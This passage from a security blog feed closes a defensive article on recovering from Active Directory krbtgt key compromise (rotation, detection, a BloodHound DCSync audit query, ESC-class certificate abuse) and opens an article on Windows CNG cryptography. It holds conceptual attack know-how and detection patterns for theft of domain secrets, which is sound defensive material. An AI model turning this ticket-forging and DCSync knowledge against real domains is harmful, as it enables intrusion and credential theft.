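    return null; // every K_0 ticket has already expired; nothing is stranded
  }
  // Tickets issued from (secondResetAt - maxTicketAgeHours) up to the first
  // reset are still live when K_0 disappears, so the KDC will reject them.
  return { from: secondResetAt - maxTicketAgeHours, to: firstResetAt };
}

console.log(strandedIssueWindow(20, 30)); // full 10-hour wait
console.log(strandedIssueWindow(20, 25)); // second reset lands 5 hours early
```

Under these assumptions the full wait strands nothing, while a reset five hours early breaks every legitimate ticket issued in the five hours before the first reset.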

`New-KrbtgtKeys.ps1`

Microsoft's reference automation for the procedure is New-KrbtgtKeys.ps1, originally distributed as an MSDN Gallery script and currently hosted in the microsoftarchive GitHub organisation. The repository banner reads, verbatim: "This repository was archived by the owner on Mar 8, 2024. It is now read-only" [@new-krbtgt-keys]. The script remains the canonical reference for the rotation procedure, including pre-reset and post-reset replication-health checks; it is simply no longer actively maintained. Operators in 2026 commonly fork it locally or wrap the same Set-ADAccountPassword plus replication-status pattern in their own runbooks.

What two-reset does

Two-reset cryptographically invalidates previously forged TGTs once the second reset has replicated fully across all writeable DCs. This is unambiguous and well documented; the Microsoft Learn page is the primary source [@ms-forest-recovery]. After the second reset has replicated, no TGT signed under the compromised key validates anywhere in the domain.

What two-reset does not do

Any attacker who held the krbtgt key has typically already installed parallel persistence. SpecterOps's "Domain of Thrones Part II" by Nico Shyne and Josh Prager, published November 6, 2023, names the rotation list verbatim: "Machine accounts ... User accounts ... Service accounts -- Per domain KRBTGT account ... Trust keys and objects related to trust of all other domains; Group-managed service accounts; Key distribution service root keys" [@specterops-dot2]. The same playbook enumerates the persistence vectors an attacker with krbtgt access typically establishes: AdminSDHolder ACL edits, AD CS template alternates spanning the ESC1 through ESC8 abuse classes (canonically catalogued in Schroeder and Christensen's "Certified Pre-Owned," SpecterOps, June 2021) [@certified-pre-owned], SID History entries, machine-account secret retention, KDS root key exfiltration, trust-key compromise, and DSRM password exfiltration. Two-reset rotates the krbtgt key only; the rest of the trust-root set is untouched [@specterops-dot1][@specterops-dot2].

Key idea: Two-reset rotation cryptographically invalidates previously-forged TGTs. It does NOT rotate any of the other secrets an attacker who held the krbtgt key has typically already installed: AdminSDHolder edits, ADCS templates, SID History, machine-account secrets, KDS root keys, trust keys, DSRM passwords. This is why confirmed krbtgt compromise is a forest-rebuild event, not a key-rotation event.

Two-reset rotation is the cryptographic finish; the operational finish spans the rest of the Domain-of-Thrones surface, and the rotation alone cannot reach it. The single-sentence punchline of the article lands at the end of §11.

Why does Microsoft's AD Forest Recovery page treat krbtgt rotation as a recoverable rotation event while Mandiant-style and SpecterOps-style playbooks treat confirmed krbtgt compromise as a forest-rebuild event? Both statements are true at once. Microsoft documents the *cryptographic* recovery, which terminates at the krbtgt key. The IR playbooks document the *operational* recovery, which spans seven additional secret classes whose compromise the krbtgt holder typically also achieved. The cryptographic recovery is necessary and well-bounded; the operational recovery is necessary and not bounded by the same key.

Recovery has two pieces: a fast cryptographic part (two resets, well-documented) and a slow operational part (seven other secret classes, days to weeks). Both are necessary. Neither is sufficient. Even the combined procedure leaves three structural residuals, which the next section names.

8. Theoretical Limits and Open Problems

Even with the full Domain-of-Thrones rotation surface executed correctly, three structural residuals remain. Each has a current best-partial-result; none has a closed solution.

(a) The pre-second-reset TGT-lifetime window

Any TGT minted from the compromised krbtgt key between the moment of compromise and the moment the second reset replicates remains valid until it expires naturally or until the second reset lands. Mimikatz's default 10-year lifetime makes this a years-long window if the attacker pre-minted tickets and the defenders missed the time-anomaly signal. The MDI Suspected-Golden-Ticket family includes a time-anomaly alert (the External ID 2022 sibling) [@mdi-classic] that reads the difference between plausible and implausible ticket lifetimes. The window is bounded below by the AD MaxTicketAge floor: the procedure must take at least 10 hours of wall-clock time per Microsoft's own guidance [@ms-forest-recovery]. Below that floor the cryptographic invalidation does not finish.

The mitigation is procedural: between detection and the start of the rotation, the IR team treats every TGT in the domain as suspect. In practice that means rejecting cached tickets at high-value services, forcing a TGT renewal cycle, and watching the time-anomaly alert closely. The mitigation is not perfect; an attacker who minted tickets with realistic 10-hour lifetimes inside the typical AD policy survives this residual entirely.
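A minimal sketch of the time-anomaly idea, and of its blind spot, follows. It is not how MDI implements its alert; the record shape (`id`, `startTime`, `endTime` in epoch milliseconds) and the function name are assumptions made for illustration.

```javascript
// Hypothetical ticket records: { id, startTime, endTime }, times in epoch milliseconds.
const HOUR_MS = 60 * 60 * 1000;

// Flag any ticket whose lifetime exceeds the domain's MaxTicketAge policy.
function flagLifetimeAnomalies(tickets, maxTicketAgeHours = 10) {
  const limitMs = maxTicketAgeHours * HOUR_MS;
  return tickets.filter((t) => t.endTime - t.startTime > limitMs);
}

const start = Date.UTC(2026, 0, 1);
const tickets = [
  { id: "legit", startTime: start, endTime: start + 10 * HOUR_MS },
  // Roughly the 10-year default lifetime described above.
  { id: "forged-default", startTime: start, endTime: start + 10 * 365 * 24 * HOUR_MS },
  // A forged ticket minted with a policy-conformant lifetime.
  { id: "forged-realistic", startTime: start, endTime: start + 10 * HOUR_MS },
];

console.log(flagLifetimeAnomalies(tickets).map((t) => t.id)); // [ 'forged-default' ]
```

The ticket with the realistic lifetime passes untouched, which is the residual the paragraph above describes.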

(b) AD CS alternate persistence (the ESC class)

An attacker who held the krbtgt key long enough to also touch AD Certificate Services has often installed an ESC-class alternate-identity persistence: a certificate template that lets the enrollee supply the subject and so obtain a certificate as a Domain Admin (ESC1), a template whose access-control list lets an attacker-controlled principal rewrite it (ESC4), or an HTTP-bound CA enrollment endpoint vulnerable to NTLM relay (ESC8). The ESC class taxonomy is catalogued in Schroeder and Christensen's "Certified Pre-Owned" white paper (SpecterOps, June 2021) [@certified-pre-owned]. The compromised template or endpoint survives krbtgt rotation entirely. The CA private key is its own trust root, parallel to (not subordinate to) the krbtgt key. Domain-of-Thrones Part II names ADCS as a separate rotation workstream that must be addressed alongside the krbtgt reset [@specterops-dot2].

The structural fact: a domain with AD CS deployed has at least two cryptographic trust roots (krbtgt long-term key + CA private key), and each is recoverable only through its own mechanism. PKINIT, the Kerberos pre-authentication extension that validates certificate-bearing AS-REQs, accepts identities the CA chain attests to. Compromise of the CA chain yields valid Kerberos authentication as any principal, by a different mechanism than holding the krbtgt key, with the same end result.

(c) Cross-domain trust-key compromise

Within a multi-domain forest, the krbtgt of each domain is trusted by the others through inter-domain trust keys. A krbtgt compromise in a child domain can become a forest-level event if the trust topology is not hardened: SID Filtering misconfigurations, missing Selective Authentication on outbound trusts, or stale forest-trust artefacts from earlier domain migrations all extend the blast radius beyond the directly-compromised domain. Microsoft's "Recover from systemic identity compromise" guidance and the AD Forest Recovery procedure index together cover the cross-domain rotation requirements; Domain-of-Thrones Part II's "Trust keys and objects related to trust of all other domains" entry is the concise operational statement [@specterops-dot2].

The mitigation is architectural: domain-isolation discipline at the design phase plus Selective Authentication on all inbound trusts. After the fact, every domain whose krbtgt the compromised domain trusted (directly or transitively) becomes part of the rotation surface.

(d) The HSM-bound krbtgt aspiration

A theoretically clean solution exists in the literature: split the krbtgt key material such that no single party -- including the DC's own KDC service -- could read the full key in cleartext. The construction would be a hardware-security-module-bound krbtgt key (the HSM exposes only sign and verify operations on a key it never releases), or a threshold-cryptography scheme (the key is reconstructed across $n$ DCs, $t$ of which must cooperate per ticket-signing operation). Either construction would close the underlying primitive by making the krbtgt key unreadable in cleartext to anyone with code execution on a DC.

Neither construction is supported by any [MS-KILE] revision through 47.0 dated April 27, 2026 [@mskile]. Neither is on any published Microsoft roadmap as of May 2026. The closest analogue that has shipped -- LSAISO/Credential Guard's VBS trustlet for LSASS secrets on workstations and member servers -- explicitly omits the writeable-DC case by design, because a writeable DC must read the krbtgt key to issue tickets.

Even after two-reset and Domain of Thrones, three residuals remain: a window of time, an alternate trust root, and a topology problem. None of them are theoretical -- all three are operational realities documented in 2024-2026 incident-response practice. But they raise a different question: how does the krbtgt key compare to the other secrets in an AD trust-root set?

9. Where KRBTGT Sits in the AD Trust-Root Set

A correction to a framing that appears in many secondary write-ups: the krbtgt long-term key is one of a small set of "AD trust roots," not the only one. The framing matters because the rotation playbook in Section 7 lists seven secret classes for a reason: each is a candidate trust root that survives compromise of any other.

KRBTGT long-term key. Issues TGTs for all principals in the domain. Unique property within the Kerberos trust root: holding it forges TGTs for arbitrary principals, including ones that do not exist in the directory. Rotation: the two-reset, ten-hour-interval procedure on the AD Forest Recovery page [@ms-forest-recovery].

AD CS root CA private key. Issues certificates that PKINIT trusts for Kerberos pre-authentication. Compromise yields Kerberos auth as any principal via PKINIT -- a different mechanism with the same end result. Rotation: CA hierarchy rebuild, significantly more expensive than krbtgt rotation. SpecterOps "Certified Pre-Owned" (Schroeder + Christensen, June 2021) is the canonical primary on the ESC-class abuses of this trust root, cross-referenced in Domain of Thrones Part II [@certified-pre-owned][@specterops-dot2].

KDS root key. Group Managed Service Account passwords are derived deterministically from a KDS root key plus a per-account msDS-ManagedPasswordId. Compromise of the KDS root key reads every gMSA password in the forest. Different blast radius (service accounts only). Rotation: KDS root key rotation followed by gMSA cycling [@specterops-dot2].

Per-domain inter-domain trust keys. Bridge Kerberos trust between domains in a forest or across explicit external trusts. Compromise yields cross-domain TGT minting. Rotation: per-trust password rotation, with SID Filtering and Selective Authentication audits as the standard hardening procedure.

DSRM passwords on writeable DCs. Directory Services Restore Mode is a local-admin equivalent at the DC level; compromise yields a local logon to the DC, which then enables many other paths including direct read of the krbtgt key from ntds.dit. Rotation: per-DC DSRM password rotation [@specterops-dot2].

The precise framing

Within the Kerberos trust root of a single domain, the krbtgt key occupies a unique position: it is the issuer of every TGT, and forging a TGT requires exactly this key. At the forest-AD-trust-graph level, the krbtgt key is one of a handful of high-cost-to-rotate trust roots, not the only one. The framing matters because it explains why Domain of Thrones Part II lists seven rotation workstreams: each is a candidate path to the same end result (arbitrary identity in the forest) through a different cryptographic mechanism.

Five trust roots, one (krbtgt) with a unique forge-arbitrary-TGTs property, all five surfacing in the rotation list. With the trust-root topology mapped, the article's last technical job is the practical playbook: what does the reader actually do tomorrow morning?

10. Practical Guide: The Rotation and Detection Playbook

Four lanes. Each lane is a concrete action a reader can execute starting tomorrow morning.

Note:
Lane 1: Preventive hygiene -- rotate krbtgt twice a year on a calendar schedule and audit who can DCSync.
Lane 2: Detection deployment -- ship MDI Suspected-Golden-Ticket alerts plus SIEM T1558.001 content.
Lane 3: Confirmed-compromise response -- two-reset rotation followed by the Domain-of-Thrones surface.
Lane 4: What does NOT work -- four traps to avoid.

Lane 1: preventive hygiene

Rotate the krbtgt password twice a year on a calendar schedule, regardless of any specific incident. Use New-KrbtgtKeys.ps1 (or a fork of it) with pre-reset and post-reset replication-health checks [@new-krbtgt-keys]. Verify Active Directory replication health between the two rotations; if replication is lagging on any DC, the second reset can outpace the first in some replicas and break in-flight tickets.

Move every Tier-0 account into the Protected Users group. Enable Credential Guard on every workstation and member server. Credential Guard does NOT protect the DC itself by design -- DCs must read the krbtgt key unencrypted -- but it kills the workstation memory scrape that initially gets an attacker into a position to pivot to the DC.

Audit who can invoke DCSync. The BloodHound query MATCH (u)-[:DCSync]->(d:Domain) RETURN u returns every principal whose existing AD permissions can extract the krbtgt key without a DC compromise [@bloodhound-notes][@mitre-t1003006]. Every match should map to a justified administrative role; any unexpected match is a finding.
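The "any unexpected match is a finding" rule is a set difference. A minimal sketch, assuming the DCSync edge holders have already been exported as a list of principal names and that an approved-role list exists somewhere; both inputs and the function name are hypothetical.

```javascript
// Hypothetical inputs: principals holding a DCSync edge (exported from the graph)
// and the principals the organisation has approved for replication rights.
function unexpectedDcsyncPrincipals(edgePrincipals, approvedPrincipals) {
  // Compare case-insensitively; directory names are not case-sensitive.
  const approved = new Set(approvedPrincipals.map((p) => p.toUpperCase()));
  const holders = new Set(edgePrincipals.map((p) => p.toUpperCase()));
  return [...holders].filter((p) => !approved.has(p)).sort();
}

const edgeHolders = [
  "DOMAIN CONTROLLERS@CORP.EXAMPLE",
  "ENTERPRISE ADMINS@CORP.EXAMPLE",
  "svc-backup@corp.example",
];
const approvedRoles = [
  "Domain Controllers@corp.example",
  "Enterprise Admins@corp.example",
];

console.log(unexpectedDcsyncPrincipals(edgeHolders, approvedRoles));
// [ 'SVC-BACKUP@CORP.EXAMPLE' ]
```

Each name in the result is a principal to justify or strip of replication rights.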

LSAISO is a Virtualisation-Based Security trustlet that isolates long-term secrets from code running in the normal OS, even at SYSTEM or kernel privilege, on workstations and member servers. On writeable DCs the design omits LSAISO because the KDC service must read the krbtgt key unencrypted to issue tickets. This is precisely the design property a DCSync-capable attacker exploits.

Note: Two krbtgt rotations per year as preventive hygiene -- not a response to a specific incident. Use New-KrbtgtKeys.ps1 with replication-health checks before, between, and after. The 10-hour wait between rotations is mandatory; do not shorten it [@ms-forest-recovery].

Lane 2: detection deployment

Ship the MDI Suspected-Golden-Ticket alert family plus the DCSync alert (External ID 2006) [@mdi-classic][@mdi-credential]. Confirm the Suspected-Golden-Ticket alerts (2009, 2013, 2022, 2027, 2032, 2040) are active for every domain controller MDI is deployed against. Configure Microsoft Sentinel content-pack rules covering T1558.001 Golden Ticket and Kerberos-anomaly patterns (not the T1558.003 Kerberoasting rules, which target service-account SPNs and are not a krbtgt detection asset). Configure Splunk T1558.001 detection [@splunk-7d9] and tune the encryption-type baseline against legacy systems that legitimately negotiate RC4 (or, better, retire those systems).
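The encryption-type baseline can be sketched as a filter over parsed service-ticket events. This is an illustration of the idea, not the Splunk or Sentinel rule itself: the record shape (`eventId`, `ticketEncryptionType` as a hex string, `clientAddress`) is an assumed parse of Windows Event 4769, and the allow-list stands in for whatever legacy inventory the environment maintains.

```javascript
// Kerberos etype values for RC4: 0x17 (RC4-HMAC) and 0x18 (RC4-HMAC-EXP).
const RC4_ETYPES = new Set([0x17, 0x18]);

// Hypothetical parsed events: { eventId, ticketEncryptionType, clientAddress, serviceName }.
function rc4TicketRequests(events, legacyAllowList = []) {
  const allowed = new Set(legacyAllowList);
  return events.filter(
    (e) =>
      e.eventId === 4769 &&
      RC4_ETYPES.has(Number.parseInt(e.ticketEncryptionType, 16)) &&
      !allowed.has(e.clientAddress) // known legacy hosts are baselined out
  );
}

const events = [
  { eventId: 4769, ticketEncryptionType: "0x12", clientAddress: "10.0.0.5", serviceName: "cifs/fs01" },
  { eventId: 4769, ticketEncryptionType: "0x17", clientAddress: "10.0.0.9", serviceName: "cifs/fs01" },
  { eventId: 4769, ticketEncryptionType: "0x17", clientAddress: "10.0.0.77", serviceName: "http/legacy" },
];

console.log(rc4TicketRequests(events, ["10.0.0.77"]).map((e) => e.clientAddress));
// [ '10.0.0.9' ]
```

Every address on the allow-list is a host the rule cannot see, which is the argument for retiring those systems instead of baselining them.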

Ingest BloodHound for posture-graph visibility. Configure regular collections (the default is weekly) so the DCSync edge list stays current as ACLs change. Cross-reference the DCSync edge inventory against the actual administrative role assignments quarterly.

Lane 3: confirmed-compromise response

When MDI or Sentinel surfaces a confirmed krbtgt compromise -- DCSync extraction observed against a writeable DC, or a Suspected-Golden-Ticket alert with concrete supporting evidence -- the response runs in two parallel tracks. The cryptographic track executes the two-reset rotation: reset the krbtgt password (replicate, verify), wait at least 10 hours, reset again (replicate, verify) [@ms-forest-recovery]. The operational track executes the Domain-of-Thrones Part II rotation surface [@specterops-dot2]:

AD CS template review covering the ESC1 through ESC8 abuse classes [@certified-pre-owned]; replace or restrict templates with EnrolleeSuppliesSubject, broad Enroll permissions, or weak EKU restrictions.
SID History audit (Get-ADUser -Filter * -Properties SIDHistory); investigate every account whose SID History contains a Domain Admins or Enterprise Admins SID.
AdminSDHolder ACL audit; reset Protected Group inherited ACLs and verify the SDProp runs cleanly.
Machine-account secret rotation, especially for Tier-0 servers.
KDS root-key rotation followed by gMSA password cycling.
Trust-key rotation for every inbound and outbound trust.
DSRM password rotation on every writeable DC.

After both tracks complete, re-baseline detection: the post-incident DC event-log baseline will differ from the pre-incident baseline, and detection thresholds may need re-tuning to suppress the resulting alerts.

The reference automation runs against the krbtgt SID specifically, not the friendly name, to avoid any ambiguity with a renamed object. Conceptually: `Set-ADAccountPassword -Identity (Get-ADUser -Identity "$((Get-ADDomain).DomainSID.Value)-502") -Reset -NewPassword (ConvertTo-SecureString (New-RandomPassword) -AsPlainText -Force)`, where `New-RandomPassword` stands in for whatever random-password helper the runbook supplies; it is not a built-in cmdlet. The Microsoft Learn PowerShell reference for the `Set-ADAccountPassword` cmdlet documents the `-Reset` plus `-NewPassword` parameters used here [@ms-set-adaccountpassword]. The `New-KrbtgtKeys.ps1` script wraps this with replication checks and a confirmation prompt [@new-krbtgt-keys]. Production runbooks always include a pre-check that `Get-ADReplicationFailure` returns no failures before any reset is issued.

Lane 4: what does NOT work

Note:
Trap 1: Renaming krbtgt. The KDC locates the account through its RID 502 binding, not its sAMAccountName. The KDC service does not care about the friendly name.
Trap 2: Disabling krbtgt. The account is already disabled for interactive logon by design [@ms-default-accounts]. Toggling the field is semantically meaningless to the KDC service, which reads the long-term key directly from the directory.
Trap 3: Single rotation. Password-history-of-2 means a single rotation only retires the older of the two keys, leaving the attacker-extracted key (which was current at compromise) still in the previous slot [@ms-forest-recovery]. The procedure must run twice.
Trap 4: Treating MDI Suspected-Golden-Ticket alerts as sufficient. Those alerts do not cover Diamond and Sapphire by construction. Sapphire defeats every PAC-content anomaly detection because the PAC is genuine. Confirmed-compromise response must assume the worst even when MDI is silent.

Preventive hygiene, detection deployment, confirmed-compromise response, and four traps to avoid. The FAQ that follows addresses what remains.

11. FAQ

No. Full PAC Signature enforcement retires Diamond Tickets that do not recompute the Full PAC Signature. It does nothing against tickets minted from a known krbtgt key, including Sapphire Tickets (no PAC modification) and recomputed Diamond Tickets (the attacker holds the key and can compute the new signature in the same step as the older KDC signature) [@kb5020805][@mspac].

No. Renaming the account changes nothing; see §10 Lane 4 trap #1: the KDC locates the account through its RID 502 binding, not its `sAMAccountName` [@ms-default-accounts][@ms-sids].

No. A single reset is not enough; see §10 Lane 4 trap #3: password-history-of-2 keeps the previous key valid after a single rotation, so the procedure must run twice with at least `MaxTicketAge` between resets [@ms-forest-recovery][@new-krbtgt-keys].

No. Credential Guard does not protect the krbtgt key on a DC; see the §10 aside on why Credential Guard skips the DC: the KDC service on a writeable DC must read the krbtgt key unencrypted to issue tickets, and DCSync is a remote replication API call (DRSGetNCChanges), not a local LSASS memory scrape [@mitre-t1003006][@ms-credential-guard].

Mechanically, in-flight TGT validation requires the previous-key slot to retain validity for at least `MaxTicketAge` after each rotation. Operationally, the recommended cadence is calendar-driven preventive rotation twice a year, with incident-driven rotation as a separate workstream when confirmed compromise is detected [@ms-forest-recovery].

Indirectly. Retiring RC4 forces all krbtgt-encrypted tickets to AES, raising the offline-crack bar against a captured ticket and reducing the surface for the Splunk RC4-Kerberos-anomaly detection family [@splunk-7d9]. It does not affect attacks against a captured krbtgt key; both AES-128 and AES-256 derivations are held in the same account and both validate forged TGTs cleanly.

Yes. Each Read-Only Domain Controller has its own `krbtgt_` account whose key signs TGTs only for principals that the RODC can authenticate [@adsec-483]. The full-domain krbtgt is the only account whose key signs TGTs accepted by every DC in the domain; compromise of an RODC-specific `krbtgt_` is a contained event whose blast radius is bounded by the RODC's allowed-list policy.

No. The IAKerb and Local KDC features shipping in recent Windows builds affect *where* KDCs run (allowing client-to-client Kerberos without a domain-joined intermediary), not the krbtgt-key trust root inside a domain. The post-RC4 enctype work affects *which* enctypes the krbtgt key derives, not the role of the key. As of [MS-KILE] revision 47.0 dated April 27, 2026, the krbtgt long-term key is still the sole trust anchor for every TGT in the domain [@mskile].

One sentence to take away

Krbtgt rotation invalidates forged TGTs; it does not recover the systemic compromise that produced the forged TGTs in the first place.

That is the precise sentence to keep from ten thousand words. The cryptographic question -- "is the ticket valid?" -- terminates at one key. The operational question -- "is the domain still ours?" -- never does. The 1988 design chose to make ticket validation a property of a single shared secret because that choice made the protocol simple and provably correct. The choice remains correct in 2026. What changed is the meaning of the word compromise: in 1988 the threat model was a passive eavesdropper on a campus LAN; in 2026 the threat model is a remote API call that streams the secret across a DRSGetNCChanges exchange. The key did not move. The attacker's reach did.

CNG Architecture: BCrypt, NCrypt, KSPs, and How Windows Picks Its Algorithms

noreply@paragmali.com (Parag Mali) — Sat, 16 May 2026 00:00:00 GMT

Since Windows Vista, every piece of cryptography in Windows -- TLS, BitLocker, Authenticode, Windows Hello, DPAPI -- flows through the **Cryptography API: Next Generation (CNG)**. CNG splits the world into two layers. **BCrypt** does primitives: AES, SHA, HMAC, RNG, key derivation. **NCrypt** routes calls to a **Key Storage Provider (KSP)** that owns the long-lived private keys: software, TPM, smart card, or a third-party HSM. Algorithm selection is governed by a registered provider-priority list, the Schannel cipher-suite order, and a single FIPS-mode toggle that flips Windows into its validated subset. Windows 11 24H2 added the first post-quantum primitives (ML-KEM, ML-DSA) to the same surface, with no API break. This article walks through how that machine works, why Microsoft designed it that way, and where it leaks.

1. From CAPI to CNG: why Microsoft started over

In the late 1990s, Microsoft shipped its first general cryptographic API. The original CryptoAPI (CAPI) provider model [@learn-microsoft-com-service-providers] arrived in Windows NT 4.0 Service Pack 4 in 1998 and defined a plug-in unit called a Cryptographic Service Provider, or CSP. A CSP was a monolithic DLL: it owned the algorithm implementations, the key storage, and the export-control posture all at once. If you wanted to add hardware-backed RSA on Windows NT, you wrote a CSP. If you wanted to add a new hash function, you also wrote a CSP. The model worked for the algorithms Microsoft had in mind when it designed it.

Then the algorithms changed.

AES was standardized in 2001, after CAPI's design was already frozen. Microsoft retrofitted AES into the original architecture by shipping the Microsoft Enhanced RSA and AES Cryptographic Provider [@learn-microsoft-com-cryptographic-provider] as a separate CSP, sitting alongside the original Microsoft Base Cryptographic Provider. Elliptic-curve cryptography was even more awkward: CAPI's algorithm identifiers and key-blob formats had no place for ECC curves. Every new algorithm required a new CSP or a new release of an existing one. The plug-in surface was rigid, the FIPS validation story was painful, and the API was relentlessly C-shaped in ways that made auditing hard.

Microsoft was not alone. The same era produced Intel's Common Data Security Architecture (CDSA) [@en-wikipedia-org-os-2] and several short-lived crypto frameworks for OS/2 and other platforms. Most of them disappeared. CAPI's longevity owed more to Windows market share than to its design.

By 2005, Microsoft had started over. The result was the Cryptography API: Next Generation, or CNG, which shipped with Windows Vista in January 2007 and with Windows Server 2008 the following year [@learn-microsoft-com-cng-portal]. CNG was not a refactor. It was a clean second system, designed from a different set of assumptions: algorithms would keep arriving, key storage needed to be a separate concern, FIPS validation had to be a first-class output, and the same API had to work in user mode and kernel mode.

CNG (Cryptography API: Next Generation): The Windows cryptographic API introduced in Vista (2007) as the long-term replacement for CAPI. CNG splits cryptography into a primitives layer (`bcrypt.h`, `bcryptprimitives.dll`) and a key-storage layer (`ncrypt.h`, `ncrypt.dll`), each pluggable through registered providers. Used by every modern Windows component that touches cryptography.

CSP (Cryptographic Service Provider): The plug-in unit of the legacy CAPI architecture (1998-onward). A CSP bundled algorithms, key storage, and FIPS posture into a single DLL. Largely superseded by CNG providers, but still present on the system for backwards compatibility.

The three design pillars Microsoft committed to in the CNG portal documentation were modularity, cryptographic agility, and FIPS-compliance readiness [@learn-microsoft-com-cng-features]. All three would matter twenty years later when post-quantum cryptography arrived without warning the protocol authors. We will get to that.

Throughout this article, "BCrypt" refers to Microsoft's CNG primitives header `bcrypt.h` and its companion DLL `bcryptprimitives.dll`. It is not the Provos-Mazières password-hashing function of the same name, which is unrelated and is conventionally written in lowercase ("bcrypt"). The naming collision is unfortunate but firmly entrenched in Windows.

2. BCrypt: the symmetric stack and the ephemeral key

Open a Visual Studio project, include <bcrypt.h>, link bcrypt.lib, and you have access to almost every cryptographic primitive Windows ships. AES in CBC, CFB, ECB, GCM, and CCM modes. SHA-1, SHA-256, SHA-384, SHA-512, the SHA-3 family, and the cSHAKE128 and cSHAKE256 extendable-output functions added in Windows 11 24H2 [@learn-microsoft-com-algorithm-identifiers]. HMAC over any of those hashes. PBKDF2. The NIST SP 800-108 key-derivation construction. The DRBG-based random number generator drawn from NIST SP 800-90 [@csrc-nist-gov-1-final]. Ephemeral asymmetric operations -- RSA encrypt, ECDSA sign, ECDH key agreement -- on key handles that vanish when the process exits.

The canonical BCrypt opening dance is four calls, followed by two more for cleanup.

{`
// Pseudocode mirroring the BCryptOpenAlgorithmProvider flow.
// In real C: NTSTATUS values, BCRYPT_ALG_HANDLE, etc.

const algId = "AES";  // wide string
const impl = null;    // null -> walk the priority list
const flags = 0;

const hAlg = BCryptOpenAlgorithmProvider(algId, impl, flags);
BCryptSetProperty(hAlg, "ChainingMode", "ChainingModeGCM");

const hKey = BCryptGenerateSymmetricKey(hAlg, keyBytes);
const ciphertext = BCryptEncrypt(hKey, plaintext, authInfo);

BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
`}

The interesting parameter is impl (pszImplementation in the real signature). When it is NULL, BCryptOpenAlgorithmProvider "attempts to open each registered provider, in order of priority, for the algorithm specified by the pszAlgId parameter and returns the handle of the first provider that is successfully opened" [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]. That sentence is the whole story of CNG provider priority in thirty words.

Algorithm identifiers are wide strings: L"AES", L"SHA256", L"RSA", L"ML-KEM", L"ML-DSA", L"CHACHA20_POLY1305", L"CSHAKE128". Each string is registered in CNG's configuration store under HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\, with a per-algorithm ordered list of providers that claim to implement it. Add a new algorithm and you add a new string. Add a new provider and you append to its priority list. The API surface does not change.
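The priority walk can be modelled in a few lines. This is a toy model in the same pseudocode register as the block above, not the real lookup: the `Map` stands in for the configuration store, "Example HSM Provider" and the `tryOpen` callback are hypothetical, and the error string only borrows the name of the real status code.

```javascript
// Toy model: algorithm identifier -> ordered list of providers that claim it.
function openAlgorithmProvider(registry, algId, impl, tryOpen) {
  const providers = registry.get(algId);
  if (!providers) throw new Error("STATUS_NOT_FOUND: " + algId);
  // impl === null walks the whole priority list; a name pins one provider.
  const candidates = impl === null ? providers : providers.filter((p) => p === impl);
  for (const provider of candidates) {
    const handle = tryOpen(provider, algId);
    if (handle !== null) return handle; // the first provider that opens wins
  }
  throw new Error("STATUS_NOT_FOUND: " + algId);
}

const registry = new Map([
  ["AES", ["Example HSM Provider", "Microsoft Primitive Provider"]],
]);
// Pretend the hypothetical HSM provider is unavailable on this machine.
const tryOpen = (provider, algId) =>
  provider === "Example HSM Provider" ? null : { provider, algId };

console.log(openAlgorithmProvider(registry, "AES", null, tryOpen).provider);
// Microsoft Primitive Provider
```

An identifier with no registered list, such as "SHA-256" with a hyphen, never reaches a provider at all in this model.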

Note: The algorithm-identifier string is the seam where cryptographic agility lives. As long as your protocol can encode "use whatever the spec calls AES-256-GCM," and as long as a CNG provider answers to that name, you can swap implementations without touching the calling code. Protocols whose wire format hard-codes the algorithm (the old SSL 3.0 cipher list, for example) do not get this benefit no matter what crypto API they call.

Underneath the API is a single implementation library. Microsoft's SymCrypt [@github-com-microsoft-symcrypt] has been the actual workhorse since Windows 10 version 1703: "SymCrypt is the core cryptographic function library currently used by Windows... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows." SymCrypt is open source. It carries hand-tuned assembly for AES-NI, VAES, SHA-NI, and PCLMULQDQ on x64, plus ARM64 SHA and AES intrinsics. On a modern Xeon, AES-GCM throughput from BCrypt routinely sits in the 4 to 8 GB/s range per core.

SymCrypt's open-source release in 2019 was a quiet event for a Microsoft library: the algorithms that protect Windows are reviewable by anyone willing to read C and ARM/x64 assembly.

BCrypt keys are ephemeral by construction. A BCRYPT_KEY_HANDLE lives in your process and dies with it. If you want to keep a private key around between processes, between reboots, or between machines, you do not use BCrypt. You use NCrypt.

That distinction is the first thing developers get wrong when they meet CNG. The second thing they get wrong is forgetting that BCrypt's GCM API does not allocate nonces for you. The NIST SP 800-38D specification of Galois/Counter Mode [@nvlpubs-nist-gov-nistspecialpublication800-38dpdf] is famously brittle under nonce reuse: a single repeated nonce under the same key destroys both confidentiality (XOR of plaintexts leaks) and authenticity (the GHASH authentication key becomes recoverable). With 96-bit random nonces the birthday bound limits safe usage to roughly $2^{32}$ invocations per key before collision probability becomes meaningful. Counter-based nonces sidestep the birthday bound entirely but require persistent state. CNG does neither for you. That part is your problem.
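The $2^{32}$ figure falls out of the birthday approximation, and it is worth running the numbers once. The Python sketch below is arithmetic only: `nonce_collision_probability` and `counter_nonce` are illustrative helper names, and the 4-byte sender field plus 8-byte counter layout is one assumed way to fill 12 bytes deterministically, not something CNG prescribes.

```python
import math


def nonce_collision_probability(invocations: int, nonce_bits: int = 96) -> float:
    """Birthday approximation: p ~= 1 - exp(-n(n-1) / (2 * 2^bits))."""
    pairs = invocations * (invocations - 1) / 2
    return -math.expm1(-pairs / 2.0 ** nonce_bits)


def counter_nonce(sender_id: int, counter: int) -> bytes:
    """Deterministic 12-byte nonce: 4-byte sender field, then an 8-byte counter."""
    # to_bytes raises OverflowError once either field no longer fits.
    return sender_id.to_bytes(4, "big") + counter.to_bytes(8, "big")


p_at_limit = nonce_collision_probability(2 ** 32)    # about 2^-33
p_past_limit = nonce_collision_probability(2 ** 40)  # about 2^-17

print(f"2^32 random nonces: p ~= {p_at_limit:.3e}")
print(f"2^40 random nonces: p ~= {p_past_limit:.3e}")
print(counter_nonce(1, 0).hex(), counter_nonce(1, 1).hex())
```

Every factor of two in message count costs two bits of safety margin, which is why the random-nonce limit arrives so much sooner than intuition about a 96-bit space suggests. The counter construction never collides while its state survives, and that persistence requirement is exactly the part CNG leaves to the caller.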

